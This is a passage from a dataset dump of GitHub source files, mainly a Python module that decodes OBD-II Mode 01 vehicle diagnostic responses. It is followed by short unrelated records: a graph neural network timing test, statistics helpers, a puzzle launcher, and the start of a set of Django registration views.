\"C0\"),\n Factory(\"NCAT_SUP\", Boolean, \"C1\"),\n Factory(\"BP_SUP\", Boolean, \"C3\"),\n Factory(\"EGS_SUP\", Boolean, \"C5\"),\n Factory(\"PM_SUP\", Boolean, \"C6\"),\n Factory(\"EGR_SUP\", Boolean, \"C7\"),\n Factory(\"HCCATRDY\", TestReady, \"D0\"),\n Factory(\"NCAT_RDY\", TestReady, \"D1\"),\n Factory(\"BP_RDY\", TestReady, \"D3\"),\n Factory(\"EGS_RDY\", TestReady, \"D5\"),\n Factory(\"PM_RDY\", TestReady, \"D6\"),\n Factory(\"EGR_RDY\", TestReady, \"D7\"),\n ]\n\n _monitor_definitions = {\n # See http://obddiagnostics.com/obdinfo/pids1-2.html\n # and http://en.wikipedia.org/wiki/OBD-II_PIDs#Bitwise_encoded_PIDs\n \"misfire\": [\"Misfire\", \"MIS_SUP\", \"MIS_RDY\"],\n \"fuel_system\": [\"Fuel System\", \"FUEL_SUP\", \"FUEL_RDY\"],\n \"components\": [\"Components\", \"CCM_SUP\", \"CCM_RDY\"],\n # Spark\n \"catalyst\": [\"Catalyst\", \"CAT_SUP\", \"CAT_RDY\"],\n \"catalyst_heater\": [\"Catalyst Heater\", \"HCAT_SUP\", \"HCAT_RDY\"],\n \"evap\": [\"Evaporative System\", \"EVAP_SUP\", \"EVAP_RDY\"],\n \"secondary_air\": [\"Secondary Air System\", \"AIR_SUP\", \"AIR_RDY\"],\n \"ac\": [\"A/C System\", \"ACRF_SUP\", \"ACRF_RDY\"],\n \"o2\": [\"O2 Sensor\", \"O2S_SUP\", \"O2S_RDY\"],\n \"o2_heater\": [\"O2 Sensor Heater\", \"HTR_SUP\", \"HTR_RDY\"],\n # Diesel\n \"nmhc_catalyst\": [\"NMHC Catalyst\", \"HCCATSUP\", \"HCCATRDY\"],\n \"nox\": [\"NOx Aftertreatment\", \"NCAT_SUP\", \"NCAT_RDY\"],\n \"egs\": [\"Exhaust Gas Sensor\", \"EGS_SUP\", \"EGS_RDY\"],\n \"pm_filter\": [\"PM Filter\", \"PM_SUP\", \"PM_RDY\"],\n # Both\n \"egr\": [\"Exhaust Gas Recirculation (EGR)\", \"EGR_SUP\", \"EGR_RDY\"],\n }\n ordered_monitors = [ \"misfire\", \"fuel_system\", \"components\",\n \"catalyst\", \"catalyst_heater\",\n \"evap\", \"secondary_air\", \"ac\", \"o2\", \"o2_heater\",\n \"nmhc_catalyst\", \"nox\", \"egs\", \"pm_filter\",\n \"egr\" ]\n continuous_monitors = set([ \"misfire\", 
\"fuel_system\", \"components\" ])\n non_continuous_monitors = set(ordered_monitors) - continuous_monitors\n\n def __init__(self, message_data, offset, pid):\n \"\"\"Initialize the object from the raw response from the vehicle\"\"\"\n ValueResponse.__init__(self, message_data, offset, pid)\n # Choose the appropriate ignition-specific factories\n self.diesel = self.bit(\"B3\")\n if self.diesel:\n factories = self._diesel_value_factories\n else:\n factories = self._spark_value_factories\n # Extract ignition-specific values\n for factory in factories:\n value = factory.extract_value(self)\n self.values.append(value)\n # Create a temporary dict of values\n values = {}\n for value in self.values:\n values[value.label] = value.value\n # Set up the structured attributes based on the values\n self.mil = values[\"MIL\"]\n self.dtc_count = values[\"DTC_CNT\"]\n self.monitors = {}\n for key, defn in self._monitor_definitions.items():\n name, supported, ready = defn\n try:\n supported = values[supported]\n ready = values[ready]\n self.monitors[key] = MonitorTest(name, supported, ready)\n except KeyError as e:\n # skip the irrelevant (spark vs. diesel) monitors\n pass\n return\n\n def _monitors_status(self, monitors):\n \"\"\"(Internal) Return a string of the status of the specified monitors.\n\n monitors -- a set of monitor keys to query\"\"\"\n s = \"\"\n for key in self.ordered_monitors:\n if key in monitors and key in self.monitors:\n m = self.monitors[key]\n s += \"%-40s %s\\n\" % (m.name + \" Monitor\", m.status())\n return s\n\n def emissions_status(self):\n \"\"\"Return a string approximating state inspection readiness results.\"\"\"\n if self.diesel:\n untested()\n return self._monitors_status(self.non_continuous_monitors)\n\n def supported_monitors(self):\n \"\"\"Return a set of supported monitor keys.\"\"\"\n if self.diesel:\n untested()\n supported = set([])\n for key, m in self.monitors.items():\n if (m.status() != \"Not Supported\"):\n supported.add(key)\n return supported\n\n def incomplete_monitors(self):\n \"\"\"Return a set of incomplete (but supported) monitor keys.\"\"\"\n if self.diesel:\n untested()\n incomplete = set([])\n for key, m in self.monitors.items():\n if (m.status() == \"Not Ready\"):\n incomplete.add(key)\n return incomplete\n\n\n###################################\n# PID $03\n\nclass FuelSystemStatus(Bitfield):\n _fields = {\n 0x01: \"OL\",\n 0x02: \"CL\",\n 0x04: \"OL-Drive\",\n 0x08: \"OL-Fault\",\n 0x10: \"CL-Fault\",\n }\n\nclass FuelSystemResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 03 request\"\"\"\n length = 2\n _value_factories = [\n Factory(\"FUELSYS1\", FuelSystemStatus, \"A\"),\n Factory(\"FUELSYS2\", FuelSystemStatus, \"B\")\n ]\n\n\n###################################\n# PID $04\n\nclass LoadValueResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 04 request\"\"\"\n length = 1\n _value_factories = [Factory(\"LOAD_PCT\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $05\n\nclass LowTemperature(Temperature):\n \"\"\"Encapsulates temperatures between -40 and +215 degC\"\"\"\n def _convert_value(self, raw_value):\n return raw_value - 40.0\n\nclass EngineCoolantTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 05 request\"\"\"\n length = 1\n _value_factories = [Factory(\"ECT\", LowTemperature, \"A\")]\n\n\n###################################\n# PID $06-$09, $55-58\n\nclass FuelTrim(Percentage):\n \"\"\"Encapsulates fuel trim values encoded in OBD 
responses\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value / 128.0) - 1.0\n\nclass FuelTrimResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01 fuel trim requests\n (PID 06-09, 55-58)\"\"\"\n # NOTE: length is variable, either 1 or 2 bytes depending on\n # how many banks of oxygen sensors there are.\n _value_factories = [\n Factory(\"A\", FuelTrim, \"A\"),\n Factory(\"B\", FuelTrim, \"B\")\n ]\n\ndef _fuel_trim_response(pid, labels):\n \"\"\"Create the PID-specific variant of the fuel trim response\"\"\"\n response_class = value_response_variant(pid, FuelTrimResponse)\n assert len(labels) == len(response_class._value_factories)\n # Override the value factories using the given labels\n for i, label in enumerate(labels):\n response_class._value_factories[i].label = label\n return response_class\n\n\n###################################\n# PID $0A, $22, $23, $59\n\nclass FuelRailPressureResponse(ValueResponse):\n length = 1\n # 22, 23, and 59 use two bytes\n _value_factories = [Factory(\"FRP\", Pressure, [\"A\", \"B\"])]\n\ndef _fuel_rail_pressure_response(pid, scale, byte_labels=None):\n response_class = value_response_variant(pid, FuelRailPressureResponse)\n # override the conversion function using the given scale factor\n factory = response_class._value_factories[0]\n factory.convert = lambda p: scale * p\n # override the byte labels if given (for PID $0A)\n if byte_labels:\n factory.set_range(byte_labels)\n response_class.length = len(factory.range)\n return response_class\n\n\n###################################\n# PID $0B\n\nclass ManifoldAbsolutePressureResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 33 request\"\"\"\n length = 1\n # TODO: tweak the pressure instance so that its imperial measure\n # is inHg instead of PSI\n _value_factories = [Factory(\"MAP\", Pressure, \"A\")]\n\n\n###################################\n# PID $0C\n\nclass EngineRPM(RPM):\n \"\"\"Encapsulates engine RPM encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return raw_value / 4.0\n \nclass EngineRPMResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0C request\"\"\"\n length = 2\n _value_factories = [Factory(\"RPM\", EngineRPM, [\"A\", \"B\"])]\n\n\n###################################\n# PID $0D\n\nclass VehicleSpeedResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0D request\"\"\"\n length = 1\n _value_factories = [Factory(\"VSS\", Velocity, \"A\")]\n\n\n###################################\n# PID $0E\n\nclass IgnitionTiming(Timing):\n \"\"\"Encapsulates ignition timing encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value - 128) * 0.5\n\nclass IgnitionTimingResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0E request\"\"\"\n length = 1\n _value_factories = [Factory(\"SPARKADV\", IgnitionTiming, \"A\")]\n\n\n###################################\n# PID $0F\n\nclass IntakeAirTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 0F request\"\"\"\n length = 1\n _value_factories = [Factory(\"IAT\", LowTemperature, \"A\")]\n\n\n###################################\n# PID $10\n\nclass AirFlowRate(Value):\n \"\"\"Encapsulates engine air flow rate encoded in OBD responses\"\"\"\n units = \"g/s\"\n def _convert_value(self, raw_value):\n return raw_value / 100.0\n _value_fmt = \"%.2f\"\n def __str__(self):\n metric = self._value_str()\n imperial = self.value * 60.0 / 453.59237\n imperial = self._value_fmt % 
imperial\n return \"%s=%s g/s (%s lb/min)\" % (self.label, metric, imperial)\n \nclass MassAirFlowResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 10 request\"\"\"\n length = 2\n _value_factories = [Factory(\"MAF\", AirFlowRate, [\"A\", \"B\"])]\n\n\n###################################\n# PID $11\n\nclass AbsoluteThrottleResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 11 request\"\"\"\n length = 1\n _value_factories = [Factory(\"TP\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $13\n\nclass O2SLocation2Bank(Bitfield):\n _fields = {\n 0x01: \"O2S11\",\n 0x02: \"O2S12\",\n 0x04: \"O2S13\",\n 0x08: \"O2S14\",\n 0x10: \"O2S21\",\n 0x20: \"O2S22\",\n 0x40: \"O2S23\",\n 0x80: \"O2S24\",\n }\n\nclass O2SLocation2BankResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 13 request\"\"\"\n length = 1\n _value_factories = [Factory(\"O2SLOC\", O2SLocation2Bank, \"A\")]\n\n\n###################################\n# PID $14-1B\n\nclass O2SensorVoltage(Voltage):\n \"\"\"Encapsulates voltages between 0V and 1.275V\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 0.005\n _value_fmt = \"%.3f\"\n \nclass O2SensorResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 2\n _value_factories = [\n Factory(\"O2S\", O2SensorVoltage, \"A\"),\n Factory(\"SHRTFT\", FuelTrim, \"B\")\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \ndef _o2_sensor_response(pid, base_response, banks_and_sensors):\n \"\"\"Create the PID-specific variant of the O2 sensor response\"\"\"\n response_class = value_response_variant(pid, base_response)\n # Set up new value factories for each bank and sensor given\n factories = []\n for bank_and_sensor in banks_and_sensors:\n for factory in response_class._value_factories:\n factory = copy.deepcopy(factory)\n factory.label = factory.label + bank_and_sensor\n factories.append(factory)\n response_class._value_factories = factories\n return response_class\n\n\n###################################\n# PID $1C\n\nclass OBDSupport(Enumeration):\n _values = {\n 0x01: \"OBD II\",\n 0x02: \"OBD\",\n 0x03: \"OBD and OBD II\",\n 0x04: \"OBD I\",\n 0x05: \"NO OBD\",\n 0x06: \"EOBD\",\n 0x07: \"EOBD and OBD II\",\n 0x08: \"EOBD and OBD\",\n 0x09: \"EOBD, OBD, and OBD II\",\n 0x0A: \"JOBD\",\n 0x0B: \"JOBD and OBD II\",\n 0x0C: \"JOBD and EOBD\",\n 0x0D: \"JOBD, EOBD, and OBD II\",\n 0x11: \"EMD\",\n 0x12: \"EMD+\",\n 0x13: \"HD OBD-C\",\n 0x14: \"HD OBD\",\n 0x15: \"WWH OBD\",\n 0x17: \"HD EOBD-I\",\n 0x18: \"HD EOBD-I N\",\n 0x19: \"HD EOBD-II\",\n 0x1A: \"HD EOBD-II N\",\n 0x1C: \"OBDBr-1\",\n 0x1D: \"OBDBr-2\",\n }\n\nclass OBDSupportResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 1C request\"\"\"\n length = 1\n _value_factories = [Factory(\"OBDSUP\", OBDSupport, \"A\")]\n\n\n###################################\n# PID $1D\n\nclass O2SLocation4Bank(Bitfield):\n _fields = {\n 0x01: \"O2S11\",\n 0x02: \"O2S12\",\n 0x04: \"O2S21\",\n 0x08: \"O2S22\",\n 0x10: \"O2S31\",\n 0x20: \"O2S32\",\n 0x40: \"O2S41\",\n 0x80: \"O2S42\",\n }\n\nclass O2SLocation4BankResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 1D request\"\"\"\n length = 1\n _value_factories = [Factory(\"O2SLOC\", O2SLocation4Bank, 
\"A\")]\n\n\n###################################\n# PID $1F\n\nclass EngineRuntimeResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 1F request\"\"\"\n length = 2\n _value_factories = [Factory(\"RUNTM\", Duration, [\"A\", \"B\"])]\n\n\n###################################\n# PID $21\n\nclass MILDistanceResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 21 request\"\"\"\n length = 2\n _value_factories = [Factory(\"MIL_DIST\", Distance, [\"A\", \"B\"])]\n\n\n###################################\n# PID $24-2B\n\nclass O2SensorLambda(Value):\n \"\"\"Encapsulates equivalence ratio (lambda)\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 0.0000305\n _value_fmt = \"%.3f\"\n \nclass O2SensorWideVoltage(Voltage):\n \"\"\"Encapsulates voltages between 0V and 7.999V\"\"\"\n def _convert_value(self, raw_value):\n return raw_value * 8.0 / 65535.0\n _value_fmt = \"%.3f\"\n \nclass O2SensorWideResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 4\n _value_factories = [\n Factory(\"LAMBDA\", O2SensorLambda, [\"A\", \"B\"]),\n Factory(\"O2S\", O2SensorWideVoltage, [\"C\", \"D\"]),\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D; we may change the class\n # hierarchy to inherit from O2SensorResponse\n # TODO: adjust the scaling at runtime depending on the\n # maximum values specified by PID $4F (when present)\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \n\n###################################\n# PID $2F\n\nclass FuelLevelResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 2F request\"\"\"\n length = 1\n _value_factories = [Factory(\"FLI\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $33\n\nclass BarometricPressureResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 33 request\"\"\"\n length = 1\n # TODO: tweak the pressure instance so that its imperial measure\n # is inHg instead of PSI\n _value_factories = [Factory(\"BARO\", Pressure, \"A\")]\n\n\n###################################\n# PID $34-3B\n\nclass O2SensorCurrent(Current):\n \"\"\"Encapsulates voltages between 0V and 7.999V\"\"\"\n def _convert_value(self, raw_value):\n return (raw_value * 128.0 / 32768.0) - 128.0\n \nclass O2SensorCurrentResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 14-1B requests\"\"\"\n length = 4\n _value_factories = [\n Factory(\"LAMBDA\", O2SensorLambda, [\"A\", \"B\"]),\n Factory(\"O2S\", O2SensorCurrent, [\"C\", \"D\"]),\n ]\n def __init__(self, message_data, offset, pid):\n # TODO: remove the factories that don't apply to this vehicle;\n # this depends on PID $13 or $1D; we may change the class\n # hierarchy to inherit from O2SensorResponse\n # TODO: adjust the scaling at runtime depending on the\n # maximum values specified by PID $4F (when present)\n ValueResponse.__init__(self, message_data, offset, pid)\n return\n \n\n###################################\n# PID $42\n\nclass ControlModuleVoltage(Voltage):\n \"\"\"Encapsulates engine RPM encoded in OBD responses\"\"\"\n def _convert_value(self, raw_value):\n return raw_value / 1000.0\n \nclass ControlModuleVoltageResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 42 request\"\"\"\n length = 2\n _value_factories = [Factory(\"VPWR\", ControlModuleVoltage, [\"A\", 
\"B\"])]\n\n\n###################################\n# PID $45\n\nclass RelativeThrottleResponse(ValueResponse):\n \"\"\"Encapsulates the response to a Mode 01, PID 45 request\"\"\"\n length = 1\n _value_factories = [Factory(\"TP_R\", PositivePercentage, \"A\")]\n\n\n###################################\n# PID $46\n\nclass AmbientAirTempResponse(ValueResponse):\n \"\"\"Encapsulates the response to Mode 01, PID 46 request\"\"\"\n length = 1\n _value_factories = [Factory(\"AAT\", LowTemperature, \"A\")]\n\n\n###################################\n# Registration\n\n_pid_classes = {\n 0x00: PIDSupportResponse,\n 0x01: MonitorStatusResponse,\n 0x03: FuelSystemResponse,\n 0x04: LoadValueResponse,\n 0x05: EngineCoolantTempResponse,\n 0x06: _fuel_trim_response(0x06, [\"SHRTFT1\", \"SHRTFT3\"]),\n 0x07: _fuel_trim_response(0x07, [\"LONGFT1\", \"LONGFT3\"]),\n 0x08: _fuel_trim_response(0x08, [\"SHRTFT2\", \"SHRTFT4\"]),\n 0x09: _fuel_trim_response(0x09, [\"LONGFT2\", \"LONGFT4\"]),\n 0x0A: _fuel_rail_pressure_response(0x0A, 3.0, [\"A\"]),\n 0x0B: ManifoldAbsolutePressureResponse,\n 0x0C: EngineRPMResponse,\n 0x0D: VehicleSpeedResponse,\n 0x0E: IgnitionTimingResponse,\n 0x0F: IntakeAirTempResponse,\n 0x10: MassAirFlowResponse,\n 0x11: AbsoluteThrottleResponse,\n 0x13: O2SLocation2BankResponse,\n 0x14: _o2_sensor_response(0x14, O2SensorResponse, [\"11\"]),\n 0x15: _o2_sensor_response(0x15, O2SensorResponse, [\"12\"]),\n 0x16: _o2_sensor_response(0x16, O2SensorResponse, [\"13\", \"21\"]),\n 0x17: _o2_sensor_response(0x17, O2SensorResponse, [\"14\", \"22\"]),\n 0x18: _o2_sensor_response(0x18, O2SensorResponse, [\"21\", \"31\"]),\n 0x19: _o2_sensor_response(0x19, O2SensorResponse, [\"22\", \"32\"]),\n 0x1A: _o2_sensor_response(0x1A, O2SensorResponse, [\"23\", \"41\"]),\n 0x1B: _o2_sensor_response(0x1B, O2SensorResponse, [\"24\", \"42\"]),\n 0x1C: OBDSupportResponse,\n 0x1D: O2SLocation4BankResponse,\n 0x1F: EngineRuntimeResponse,\n 0x20: PIDSupportResponse,\n 0x21: MILDistanceResponse,\n 0x22: _fuel_rail_pressure_response(0x22, 0.079),\n 0x23: _fuel_rail_pressure_response(0x23, 10.0),\n 0x24: _o2_sensor_response(0x24, O2SensorWideResponse, [\"11\"]),\n 0x25: _o2_sensor_response(0x25, O2SensorWideResponse, [\"12\"]),\n 0x26: _o2_sensor_response(0x26, O2SensorWideResponse, [\"13\", \"21\"]),\n 0x27: _o2_sensor_response(0x27, O2SensorWideResponse, [\"14\", \"22\"]),\n 0x28: _o2_sensor_response(0x28, O2SensorWideResponse, [\"21\", \"31\"]),\n 0x29: _o2_sensor_response(0x29, O2SensorWideResponse, [\"22\", \"32\"]),\n 0x2A: _o2_sensor_response(0x2A, O2SensorWideResponse, [\"23\", \"41\"]),\n 0x2B: _o2_sensor_response(0x2B, O2SensorWideResponse, [\"24\", \"42\"]),\n 0x2F: FuelLevelResponse,\n 0x33: BarometricPressureResponse,\n 0x34: _o2_sensor_response(0x34, O2SensorCurrentResponse, [\"11\"]),\n 0x35: _o2_sensor_response(0x35, O2SensorCurrentResponse, [\"12\"]),\n 0x36: _o2_sensor_response(0x36, O2SensorCurrentResponse, [\"13\", \"21\"]),\n 0x37: _o2_sensor_response(0x37, O2SensorCurrentResponse, [\"14\", \"22\"]),\n 0x38: _o2_sensor_response(0x38, O2SensorCurrentResponse, [\"21\", \"31\"]),\n 0x39: _o2_sensor_response(0x39, O2SensorCurrentResponse, [\"22\", \"32\"]),\n 0x3A: _o2_sensor_response(0x3A, O2SensorCurrentResponse, [\"23\", \"41\"]),\n 0x3B: _o2_sensor_response(0x3B, O2SensorCurrentResponse, [\"24\", \"42\"]),\n 0x40: PIDSupportResponse,\n 0x42: ControlModuleVoltageResponse,\n 0x45: RelativeThrottleResponse,\n 0x46: AmbientAirTempResponse,\n 0x55: _fuel_trim_response(0x55, [\"STSO2FT1\", 
\"STSO2FT3\"]),\n 0x56: _fuel_trim_response(0x56, [\"LGSO2FT1\", \"LGSO2FT3\"]),\n 0x57: _fuel_trim_response(0x57, [\"STSO2FT2\", \"STSO2FT4\"]),\n 0x58: _fuel_trim_response(0x58, [\"LGSO2FT2\", \"LGSO2FT4\"]),\n 0x59: _fuel_rail_pressure_response(0x59, 10.0),\n 0x60: PIDSupportResponse,\n 0x80: PIDSupportResponse,\n 0xA0: PIDSupportResponse,\n 0xC0: PIDSupportResponse,\n 0xE0: PIDSupportResponse,\n }\n\nfor _pid, class_ in _pid_classes.items():\n register_response_class(sid=0x01, pid=_pid, cls=class_)\n\n\"\"\"\nlengths = {\n 0x01: { # SID $01\n 0x02: 2,\n 0x03: 2,\n 0x04: 1,\n 0x05: 1,\n # 6-9 are 1-or-2\n 0x0A: 1,\n 0x0B: 1,\n 0x0C: 2,\n 0x0D: 1,\n 0x0E: 1,\n 0x0F: 1,\n 0x10: 2,\n 0x11: 1,\n 0x12: 1,\n 0x13: 1,\n 0x14: 2,\n 0x15: 2,\n 0x16: 2,\n 0x17: 2,\n 0x18: 2,\n 0x19: 2,\n 0x1A: 2,\n 0x1B: 2,\n 0x1C: 1,\n 0x1D: 1, \n 0x1E: 1,\n 0x1F: 2,\n 0x21: 2,\n 0x22: 2,\n 0x23: 2,\n 0x24: 4,\n 0x25: 4,\n 0x26: 4,\n 0x27: 4,\n 0x28: 4,\n 0x29: 4,\n 0x2A: 4,\n 0x2B: 4,\n 0x2C: 1,\n 0x2D: 1,\n 0x2E: 1,\n 0x2F: 1,\n 0x30: 1,\n 0x31: 2,\n 0x32: 2,\n 0x33: 1,\n 0x34: 4,\n 0x35: 4,\n 0x36: 4,\n 0x37: 4,\n 0x38: 4,\n 0x39: 4,\n 0x3A: 4,\n 0x3B: 4,\n 0x3C: 2,\n 0x3D: 2,\n 0x3E: 2,\n 0x3F: 2,\n 0x41: 4,\n 0x42: 2,\n 0x43: 2,\n 0x44: 2,\n 0x45: 1,\n 0x46: 1,\n 0x47: 1,\n 0x48: 1,\n 0x49: 1,\n 0x4A: 1,\n 0x4B: 1,\n 0x4C: 1,\n 0x4D: 2,\n 0x4E: 2,\n 0x4F: 4,\n 0x50: 4,\n 0x51: 1,\n 0x52: 1,\n 0x53: 2,\n 0x54: 2,\n # 55-58 are 1-or-2\n 0x59: 2,\n 0x5A: 1,\n 0x5B: 1,\n 0x5C: 1,\n 0x5D: 2,\n 0x5E: 2,\n 0x5F: 1,\n 0x61: 1,\n 0x62: 1,\n 0x63: 2,\n 0x64: 5,\n 0x65: 2,\n 0x66: 5,\n 0x67: 3,\n 0x68: 7,\n 0x69: 7,\n 0x6A: 5,\n 0x6B: 5,\n 0x6C: 5,\n 0x6D: 11,\n 0x6E: 9,\n 0x6F: 3,\n 0x70: 10,\n 0x71: 6,\n 0x72: 5,\n 0x73: 5,\n 0x74: 5,\n 0x75: 7,\n 0x76: 7, \n 0x77: 5,\n 0x78: 9,\n 0x79: 9,\n 0x7A: 7,\n 0x7B: 7,\n 0x7C: 9,\n 0x7D: 1,\n 0x7E: 1,\n 0x7F: 13,\n 0x81: 41,\n 0x82: 41,\n 0x83: 9,\n 0x84: 1,\n 0x85: 10,\n 0x86: 5,\n 0x87: 5,\n 0x88: 13,\n 0x89: 41,\n 0x8A: 41,\n 0x8B: 8, \n },\n\"\"\"\n\n\n# vim: softtabstop=4 shiftwidth=4 expandtab\n","repo_name":"lukevp/Python-OBD-Scanner","sub_path":"pyobd2-0.4/obd/message/sid01.py","file_name":"sid01.py","file_ext":"py","file_size_in_byte":28474,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"79"} +{"seq_id":"24844820543","text":"import numpy as np\nfrom GNN.dataset import load_dataset\nfrom GNN.graph import *\n\nimport torch\nimport torch_geometric as geo\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\nimport time\n\n\ngraph_full = load_dataset(\"Cora\")\ntrain_split = int(0.8 * graph_full.num_nodes)\ngraph_full.add_self_loop()\ngraph = split_training_set(graph_full, train_split)\nnum_features = graph_full.num_features # =1433\nnum_classes = graph_full.num_classes # =7\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(num_features, 16)\n self.conv2 = GCNConv(16, num_classes)\n\n def forward(self, x, edge_index):\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n x = self.conv2(x, edge_index)\n return x\n\ndef train_pyg(num_epoch):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model = Net().to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n model.train()\n x = torch.Tensor(graph.x).to(device)\n y = torch.Tensor(graph.y).to(device, torch.long)\n edge_index = torch.Tensor(graph.edge_index).to(device, torch.long)\n start_time = time.time()\n for epoch in range(num_epoch):\n 
optimizer.zero_grad()\n        out = model(x, edge_index)\n        loss = F.cross_entropy(out, y)\n        #print(\"Train loss :\",float(loss))\n        loss.backward()\n        optimizer.step()\n        if epoch==0:\n            start_time= time.time()\n        print(epoch, \"PyG time:\",time.time()-start_time)\n    return float(loss)\n\nif __name__ == \"__main__\":\n    loss1 = train_pyg(200)","repo_name":"Hsword/Het","sub_path":"geometric/tests/test_pyg_full_batch.py","file_name":"test_pyg_full_batch.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36909384632","text":"__author__ = 'Haohan Wang'\n\nimport scipy.linalg as linalg\nimport scipy\nimport numpy as np\nfrom scipy import stats\n\ndef KFold(X,y,k=5):\n    foldsize = int(X.shape[0]/k)\n    for idx in range(k):\n        testlst = range(idx*foldsize,idx*foldsize+foldsize)\n        Xtrain = np.delete(X,testlst,0)\n        ytrain = np.delete(y,testlst,0)\n        Xtest = X[testlst]\n        ytest = y[testlst]\n        yield Xtrain, ytrain, Xtest, ytest\ndef matrixMult(A, B):\n    try:\n        linalg.blas\n    except AttributeError:\n        return np.dot(A, B)\n\n    if not A.flags['F_CONTIGUOUS']:\n        AA = A.T\n        transA = True\n    else:\n        AA = A\n        transA = False\n\n    if not B.flags['F_CONTIGUOUS']:\n        BB = B.T\n        transB = True\n    else:\n        BB = B\n        transB = False\n\n    return linalg.blas.dgemm(alpha=1., a=AA, b=BB, trans_a=transA, trans_b=transB)\n\ndef factor(X, rho):\n    \"\"\"\n    computes cholesky factorization of the kernel K = 1/rho*XX^T + I\n\n    Input:\n    X design matrix: n_s x n_f (we assume n_s << n_f)\n    rho: regularizer\n\n    Output:\n    L lower triangular matrix\n    U upper triangular matrix\n    \"\"\"\n    n_s, n_f = X.shape\n    K = 1 / rho * scipy.dot(X, X.T) + scipy.eye(n_s)\n    U = linalg.cholesky(K)\n    return U\n\ndef tstat(beta, var, sigma, q, N, log=False):\n\n    \"\"\"\n    Calculates a t-statistic and associated p-value given the estimate of beta and its standard error.\n    This is actually an F-test, but when only one hypothesis is being performed, it reduces to a t-test.\n    \"\"\"\n    ts = beta / np.sqrt(var * sigma)\n    # ts = beta / np.sqrt(sigma)\n    # ps = 2.0*(1.0 - stats.t.cdf(np.abs(ts), self.N-q))\n    # sf == survival function - this is more accurate -- could also use logsf if the precision is not good enough\n    if log:\n        ps = np.log(2.0) + (stats.t.logsf(np.abs(ts), N - q))\n    else:\n        ps = 2.0 * (stats.t.sf(np.abs(ts), N - q))\n    if not len(ts) == 1 or not len(ps) == 1:\n        raise Exception(\"Something bad happened :(\")\n    # return ts, ps\n    return ts.sum(), ps.sum()","repo_name":"HaohanWang/sLMMn","sub_path":"sLMMn/helpingMethods.py","file_name":"helpingMethods.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28447771667","text":"from CSPPuzzle import CSPPuzzle\n\ndef main():\n    x=inputInteger(\"Choose a puzzle 1 or 2 or 3 (0 to quit):\")\n    while(x==None):\n        x=inputInteger(\"Choose a puzzle 1 or 2 or 3:\")\n    if(x!=0):\n        try:\n            puzzle=CSPPuzzle(str(x))\n            puzzle.solve()\n        except SystemExit:\n            print(\"------------Puzzle is solved--------\")\n        except Exception:\n            print(\"ERROR! 
\\n please try again.\")\n        main()\ndef inputInteger(text):\n    user_input = input(text)\n    print(\"\\n\")\n    try:\n        val = int(user_input)\n        return val\n    except ValueError:\n        print(\"input is not an integer.\")\n        return None\n\nif __name__ == '__main__':\n    main()","repo_name":"halilbalci/aiHW","sub_path":"puzzleSolvingApp.py","file_name":"puzzleSolvingApp.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9694385468","text":"from django.shortcuts import redirect\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.utils.translation import ugettext as _\nfrom django.dispatch import Signal\nimport django.contrib.auth.views as auth\nfrom django.db import transaction\nfrom qrtrack.core.forms import RegistrationForm\nfrom qrtrack.core.utils.widget_list import WidgetList\nfrom qrtrack.analytics.utils import track_event\nfrom qrtrack.core.utils import Alerts\n\nprofile_widgets = WidgetList()\n# Provides the newly registered user object\nregistration_successful = 